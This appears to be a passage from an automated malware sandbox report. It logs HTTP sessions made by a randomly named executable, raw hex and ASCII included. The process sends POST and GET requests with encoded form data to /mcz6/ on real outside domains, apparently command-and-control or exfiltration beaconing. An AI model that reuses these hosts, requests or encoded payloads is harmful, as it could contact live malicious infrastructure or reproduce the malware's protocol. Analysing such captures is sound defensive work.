36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 6, 2024 13:25:45.333834887 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:25:45 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:47.203592062 CEST	10846	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f [TRUNCATED] Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRUBooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+ [TRUNCATED]
Jun 6, 2024 13:25:47.870341063 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:25:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:49.730983973 CEST	482	OUT	GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:25:50.386384964 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:25:50 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	57.151.38.169	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:55.515935898 CEST	750	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 42 68 72 63 48 62 67 77 66 32 6c 4a 52 31 72 42 47 47 52 7a 31 4e 52 30 55 79 69 5a 66 64 4d 67 66 67 3d 3d Data Ascii: l65lvjLx=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXBhrcHbgwf2lJR1rBGGRz1NR0UyiZfdMgfg==
Jun 6, 2024 13:25:56.173424006 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:25:56 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	57.151.38.169	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:58.046972990 CEST	770	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 31 48 4a 31 72 74 53 65 78 70 45 70 79 4b 36 78 55 66 52 34 58 2b 4f 61 72 59 6d 4f 38 77 70 69 73 3d Data Ascii: l65lvjLx=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknN1HJ1rtSexpEpyK6xUfR4X+OarYmO8wpis=
Jun 6, 2024 13:25:58.716847897 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:25:58 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	57.151.38.169	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:00.575181961 CEST	10852	OUT	POST /mcz6/ HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.allinone24.shop Referer: http://www.allinone24.shop/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 32 31 2b 55 6e 2f 2f 42 7a 34 51 39 75 78 59 58 48 66 55 53 65 4e 32 4c 61 36 50 2f 55 4d 6e 45 63 66 7a 45 59 2b 4d 2f 64 63 6a 34 56 31 4a 73 56 46 33 68 43 77 58 45 65 53 50 39 47 38 63 39 55 47 48 77 38 41 4e 51 2b 41 47 77 72 6c 62 53 4f 78 30 72 43 63 76 7a 57 2b 67 70 6a 34 6a 76 67 54 55 49 70 49 39 38 66 6e 35 51 6b 79 56 34 75 6d 4f 45 45 37 63 36 48 4b 54 33 49 64 45 52 69 54 4b 4b 45 71 4d 54 63 4b 71 44 6f 65 65 73 6d 4d 4f 54 2f 67 72 73 56 78 78 52 44 6b 52 4b [TRUNCATED] Data Ascii: l65lvjLx=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5OFm9VPsHDzhp/BOq9a2c5G+MhBmzS5GcRpCwIaK5ZkFtrvcMGKI5N3dZSFNAMAU0a7ctYCQ0rLDuCZDx3UDbAWmfsAPqIVwTMFzmCzuh12Yu0XdtjBC0OaBx6xGL4IS21+Un//Bz4Q9uxYXHfUSeN2La6P/UMnEcfzEY+M/dcj4V1JsVF3hCwXEeSP9G8c9UGHw8ANQ+AGwrlbSOx0rCcvzW+gpj4jvgTUIpI98fn5QkyV4umOEE7c6HKT3IdERiTKKEqMTcKqDoeesmMOT/grsVxxRDkRK/9uS5McNu24f5Oh6xP3M+yzd5yLAcBtRZPhxiAR8JMMddaXwrcUZh8t45pwso/pb9LqRD62oKM4mHmatekqATO/7g1+x1UAL/Cj+YfOqiS1uEc0DwSGqBVYzyDqPfLqEWjL57+szTki5Dy79py+ZfiQ2+xZTn/mhwy7DEuC9wbtlNdZaC5SH1m0aA+eY44qdghPqXpl1O7aYEP5EUrbiEObf3hDyM4HP0f0K0vPvc8u/DyryQ7K+7ElctIKBQgE/rmSpyl5XucGbuMN9uKBpzdgPIMQcELwuTr3wdivZZmUZIOo1BhQMQc8GBDHI38/15DaaYZ/XAtr2BcTDRyEOuczbivRN0iGlCexnsGIAqujqpk50V8vSt5UdhjYo483hhRuJWwIPFPO0WixevAZVAPGzCyk5bDwFYXtIlVGbOf6h7WEj/rRBVBxejRETLpxfXOAyK6dz2BIQHhewvmdodHJnWOz6MYSJ07hfwh5iNNZ7f4A9YycstJFZCRosfR40DuV7AnRPzFYPqxzQd+X9IkBQBDhM5LMK22ChZ0WLQ6thdH4LK+XtGVnpvHRwKb6s2lj4szBNwJiGK7h0TZOU1tc5IONnw7a7EQm/bYKr+p50SR6A3ahIUJAdyz0auO8VwDOwaRgV+/FxMiJ7/+beZnY9w5gJKYyheU [TRUNCATED]
Jun 6, 2024 13:26:01.222850084 CEST	345	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:26:01 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	57.151.38.169	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:03.105993032 CEST	484	OUT	GET /mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.allinone24.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:26:03.765876055 CEST	497	IN	HTTP/1.1 308 Permanent Redirect Date: Thu, 06 Jun 2024 11:26:03 GMT Content-Type: text/html Content-Length: 164 Connection: close Location: https://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:08.833276033 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: 